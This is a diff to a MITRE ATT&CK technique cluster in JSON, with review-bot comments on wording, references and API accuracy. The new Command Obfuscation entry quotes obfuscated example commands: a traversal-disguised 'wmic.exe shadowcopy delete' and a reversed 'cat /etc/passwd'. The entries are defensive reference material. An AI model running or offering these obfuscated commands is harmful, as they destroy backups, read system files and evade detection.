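Review bot: the new bullet list in the T1608.004 description links [Malvertising](T1583/008), an entry not shown anywhere in this patch; confirm a `T1583.008` entry exists in the cluster so the link is not dangling (the same link is added to T1189 later in this patch). The pre-existing phrase "referred to a strategic web compromise" is missing "as"; upstream wording, but this hunk rewrites the string anyway. The list is written with `\n\n* ` inside the JSON string, matching the convention already used in the T1189 description.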
@@ -16455,7 +16642,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1574/002",
- "https://capec.mitre.org/data/definitions/641.html",
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf"
]
},
@@ -16712,7 +16898,7 @@
"value": "Re-opened Applications - T1164"
},
{
- "description": "Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.",
+ "description": "Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.\n\nAdversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)",
"meta": {
"external_id": "T1571",
"kill_chain": [
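Review bot: the T1571 change fixes `paring` -> `pairing` but leaves "a protocol and port pairing that are typically not associated" with a singular subject and plural verb; upstream wording, not a blocker. The added paragraph on Registry-driven port changes introduces `(Citation: change_rdp_port_conti)`, whose sole supporting ref in the next hunk is a Twitter post; see the note there.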
@@ -16730,6 +16916,7 @@
"refs": [
"https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf",
"https://attack.mitre.org/techniques/T1571",
+ "https://twitter.com/TheDFIRReport/status/1498657772254240768",
"https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
"https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"
]
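Review bot: the only ref backing `change_rdp_port_conti` is a bare `twitter.com/TheDFIRReport/status/...` URL, which is the most fragile kind of link in this array (posts get deleted and the content is not reliably readable without an account); add a `web.archive.org` capture alongside it, following the pattern already used in this file for the Elderwood whitepaper, so the evidence for Registry-based port changes stays retrievable for defenders building detections on it.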
@@ -16798,7 +16985,7 @@
"value": "Multi-hop Proxy - T1188"
},
{
- "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. 
If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)",
+ "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting\n* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary\n* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. 
\n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)",
"meta": {
"external_id": "T1189",
"kill_chain": [
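Review bot: two wording defects survive in the rewritten T1189 description: "This kind of targeted campaign is often referred to a strategic web compromise" is missing "as", and both parenthetical cross-references ("i.e., [Drive-by Target]..." and "i.e., [Malvertising]...") introduce one example among several, so "e.g." is the intended term. Step 2 of the process list also carries a stray trailing space before the "\n * The user may be required..." sub-bullet. If this cluster is regenerated from the upstream ATT&CK STIX data, the fixes belong there, or the next sync will overwrite them.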
@@ -16905,7 +17092,7 @@
"value": "Inter-Process Communication - T1559"
},
{
- "description": "Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex)
. The token can then be used with ImpersonateLoggedOnUser
to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken
to assign the impersonated token to a thread.\n\nAn adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.",
+ "description": "Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.\n\nAn adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.\n\nWhen an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.",
"meta": {
"external_id": "T1134.001",
"kill_chain": [
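Review bot: the new last paragraph pairs a token from `DuplicateToken` or `DuplicateTokenEx` with `CreateProcessWithTokenW` and `CreateProcessAsUserW` without saying what kind of token those calls accept. Both require a primary token, and `DuplicateToken` can only produce an impersonation token, so the create-process path needs `DuplicateTokenEx` with `TokenPrimary` as the token type. Suggest "...using `CreateProcessWithTokenW` or `CreateProcessAsUserW`, which require a primary token (obtained with `DuplicateTokenEx`)" so readers do not assume either duplication API works for both branches. Moving the API names into backticks is otherwise fine.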
@@ -16988,7 +17175,7 @@
"value": "Junk Data - T1001.001"
},
{
- "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.",
+ "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)\n\nMany cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP)\n\nAdversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.",
"meta": {
"external_id": "T1020.001",
"kill_chain": [
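Review bot: the cloud sentence names the Microsoft feature "Azure vTap", but the matching reference URL added in the next hunk is the `virtual-network-tap-overview` page and the citation key reads `Azure Virtual Network TAP`; "vTap" is not the documented product name and is not searchable, so align the body text with the citation. The broadening from "network devices/infrastructure" to "devices/infrastructure" is consistent with the IaaS platform added below.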
@@ -16999,12 +17186,15 @@
"Network Traffic: Network Traffic Flow"
],
"mitre_platforms": [
- "Network"
+ "Network",
+ "IaaS"
],
"refs": [
"https://attack.mitre.org/techniques/T1020/001",
- "https://capec.mitre.org/data/definitions/117.html",
+ "https://cloud.google.com/vpc/docs/packet-mirroring",
"https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954",
+ "https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html",
+ "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview",
"https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html",
"https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html",
"https://www.us-cert.gov/ncas/alerts/TA18-106A"
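Review bot: `IaaS` is added to `mitre_platforms` while `mitre_data_sources` (the unchanged `Network Traffic: Network Traffic Flow` context line above) still names only packet-level telemetry, so the entry gives a cloud defender no control-plane signal for the AWS/GCP/Azure mirroring it now describes. Mirroring in those services is configured through the provider API (for AWS, the EC2 `CreateTrafficMirrorTarget`, `CreateTrafficMirrorSession` and `CreateTrafficMirrorFilter` calls land in CloudTrail), which is where abuse is first visible; if the upstream technique carries a cloud-service data source, it should be picked up here. The `refs` list remains alphabetically sorted after the three documentation URLs are added and the CAPEC entry dropped, so no JSON issue.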
@@ -17180,7 +17370,7 @@
"value": "LSA Secrets - T1003.004"
},
{
- "description": "Adversaries may gather credentials from information stored in the Proc filesystem or /proc
. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.\n\nThis functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.",
+ "description": "Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)\n\nWhen executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)\n\nIf running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.",
"meta": {
"external_id": "T1003.007",
"kill_chain": [
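Review bot: the rewritten paths have lost their process-id placeholder: the text reads `/proc//maps` and `/proc//mem`, and later `/maps` & `/mem`, where `/proc/<PID>/maps` and `/proc/<PID>/mem` are meant. An angle-bracket placeholder dropped like this usually means it was treated as markup, so check the generator's handling of `<...>` rather than patching only the string. Two smaller points: the citation key `Picus Labs Proc cump 2022` has "cump" for "dump", and "root privileges" understates the real gate on `/proc/<PID>/mem`, which is ptrace attach permission on the target (`CAP_SYS_PTRACE`, further restricted by Yama `ptrace_scope`); a non-root process holding that capability can read other processes' memory the same way.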
@@ -17195,7 +17385,10 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1003/007",
- "https://github.com/huntergregal/mimipenguin"
+ "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#proc-usdpid-maps-and-proc-usdpid-mem",
+ "https://github.com/huntergregal/mimipenguin",
+ "https://www.baeldung.com/linux/proc-id-maps",
+ "https://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-its-adversary-use"
]
},
"related": [
@@ -17254,8 +17447,7 @@
],
"refs": [
"http://www.icir.org/vern/papers/meek-PETS-2015.pdf",
- "https://attack.mitre.org/techniques/T1090/004",
- "https://capec.mitre.org/data/definitions/481.html"
+ "https://attack.mitre.org/techniques/T1090/004"
]
},
"related": [
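Review bot: the `https://capec.mitre.org/...` entry removed here is one of a series of identical deletions in this patch (T1110.001 through T1110.004, T1027.001, T1027.002, T1078.001, T1078.002, T1087.002 and T1505.003 further down), so this is a systematic change to every affected cluster's `refs`, not a per-entry edit. Confirm it reflects the upstream source no longer emitting CAPEC external references; if it is a local filter instead, the next regeneration will put them back. The trailing-comma handling is correct in each case: the `attack.mitre.org` line is re-emitted without the comma whenever it becomes the last element.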
@@ -17268,7 +17460,7 @@
"value": "Domain Fronting - T1090.004"
},
{
- "description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm)\n\nIn some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)",
+ "description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)\n\nIn some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)",
"meta": {
"external_id": "T1070.009",
"kill_chain": [
@@ -17280,6 +17472,7 @@
"File: File Modification",
"Process: Process Creation",
"Scheduled Job: Scheduled Job Modification",
+ "User Account: User Account Deletion",
"Windows Registry: Windows Registry Key Deletion",
"Windows Registry: Windows Registry Key Modification"
],
@@ -17290,6 +17483,7 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1070/009",
+ "https://blog.talosintelligence.com/recent-cyber-attack/",
"https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
"https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf"
]
@@ -17328,7 +17522,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1110/001",
- "https://capec.mitre.org/data/definitions/49.html",
"https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi",
"https://www.us-cert.gov/ncas/alerts/TA18-086A"
@@ -17364,7 +17557,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1110/002",
- "https://capec.mitre.org/data/definitions/55.html",
"https://en.wikipedia.org/wiki/Password_cracking",
"https://www.us-cert.gov/ncas/alerts/TA18-106A"
]
@@ -17403,7 +17595,6 @@
"refs": [
"http://www.blackhillsinfosec.com/?p=4645",
"https://attack.mitre.org/techniques/T1110/003",
- "https://capec.mitre.org/data/definitions/565.html",
"https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing",
"https://www.us-cert.gov/ncas/alerts/TA18-086A"
]
@@ -17441,7 +17632,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1110/004",
- "https://capec.mitre.org/data/definitions/600.html",
"https://www.us-cert.gov/ncas/alerts/TA18-086A"
]
},
@@ -17455,7 +17645,7 @@
"value": "Credential Stuffing - T1110.004"
},
{
- "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
+ "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
"meta": {
"external_id": "T1071.001",
"kill_chain": [
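Review bot: the WebSocket addition rests on a single citation whose reference URL (`brazking-android-malware-upgraded...`, added in the next hunk) describes an Android banking trojan, while this is the Enterprise T1071.001 cluster. The protocol claim is fine, but an enterprise-platform example would support it better than a mobile one; at minimum the mismatch should be a conscious choice. Since WebSocket sessions start as an HTTP Upgrade request, existing HTTP-based detections still see the handshake, which is worth a clause so defenders know where the overlap ends.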
@@ -17471,8 +17661,10 @@
"Windows"
],
"refs": [
+ "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf",
"https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf",
- "https://attack.mitre.org/techniques/T1071/001"
+ "https://attack.mitre.org/techniques/T1071/001",
+ "https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/"
]
},
"related": [
@@ -17595,8 +17787,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1027/001",
- "https://capec.mitre.org/data/definitions/572.html",
- "https://capec.mitre.org/data/definitions/655.html",
"https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/",
"https://www.virustotal.com/en/faq/",
"https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
@@ -17611,6 +17801,75 @@
"uuid": "5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
"value": "Binary Padding - T1027.001"
},
+ {
+ "description": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)\n\nFor example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)\n\nAdversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)\n\nTools such as Invoke-Obfuscation
and Invoke-DOSfucation
have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)",
+ "meta": {
+ "external_id": "T1027.010",
+ "kill_chain": [
+ "mitre-attack:defense-evasion"
+ ],
+ "mitre_data_sources": [
+ "Command: Command Execution",
+ "File: File Metadata",
+ "Script: Script Execution"
+ ],
+ "mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1027/010",
+ "https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html",
+ "https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16",
+ "https://github.com/danielbohannon/Invoke-DOSfuscation",
+ "https://github.com/danielbohannon/Invoke-Obfuscation",
+ "https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand",
+ "https://redcanary.com/threat-detection-report/techniques/powershell/",
+ "https://twitter.com/rfackroyd/status/1639136000755765254",
+ "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
+ "https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "value": "Command Obfuscation - T1027.010"
+ },
+ {
+ "description": "Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user. \n\nMany enterprises federate centrally managed user identities to cloud services, allowing users to login with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://attack.mitre.org/techniques/T1059/009)), using commands such as Connect-AZAccount
for Azure PowerShell, Connect-MgGraph
for Microsoft Graph PowerShell, and gcloud auth login
for the Google Cloud CLI.\n\nIn some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a username and password. ",
+ "meta": {
+ "external_id": "T1021.007",
+ "kill_chain": [
+ "mitre-attack:lateral-movement"
+ ],
+ "mitre_data_sources": [
+ "Logon Session: Logon Session Creation"
+ ],
+ "mitre_platforms": [
+ "Office 365",
+ "Azure AD",
+ "SaaS",
+ "IaaS",
+ "Google Workspace"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1021/007"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "8861073d-d1b8-4941-82ce-dce621d398f0",
+ "value": "Cloud Services - T1021.007"
+ },
{
"description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
"meta": {
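Review bot: three text defects in the new T1027.010 entry and one in T1021.007. In T1027.010 the symbol list has a period where a comma belongs (`+`. `$`), "globing" should be "globbing", and the tool is spelled `Invoke-DOSfucation` in the body while the citation key and the GitHub reference both say `Invoke-DOSfuscation`, so a search on the tool name misses the description. In T1021.007 the Azure cmdlet is canonically `Connect-AzAccount` (PowerShell resolves it case-insensitively, but the documented spelling should be used), and the cmdlet names use a different inline-code markup from the backticks in T1027.010 directly above; new entries should use one style. T1021.007 also ships with only the ATT&CK URL in `refs`, which matches its citation-free description but leaves the "Many enterprises federate..." claim unsourced.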
@@ -17740,7 +17999,7 @@
"value": "Web Cookies - T1606.001"
},
{
- "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)\n\nAdversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.",
+ "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)\n\nAdversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.",
"meta": {
"external_id": "T1608.001",
"kill_chain": [
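Review bot: the IPFS clause states the takedown-resistance benefit but not what a defender actually sees: content on IPFS is commonly fetched through public HTTP gateways, so the observable artifact is a URL of the form `https://<gateway>/ipfs/<CID>` rather than anything IPFS-specific on the wire, and one clause to that effect would make the addition actionable. Also, `(Citation: Volexity Ocean Lotus November 2020)` now sits after the IPFS clause although it supports only the GitHub/Pastebin statement; placing it before ", or hosted on" keeps the attribution precise.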
@@ -17754,6 +18013,7 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1608/001",
+ "https://blog.talosintelligence.com/ipfs-abuse/",
"https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/"
]
},
@@ -17824,7 +18084,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1078/001",
- "https://capec.mitre.org/data/definitions/70.html",
"https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html",
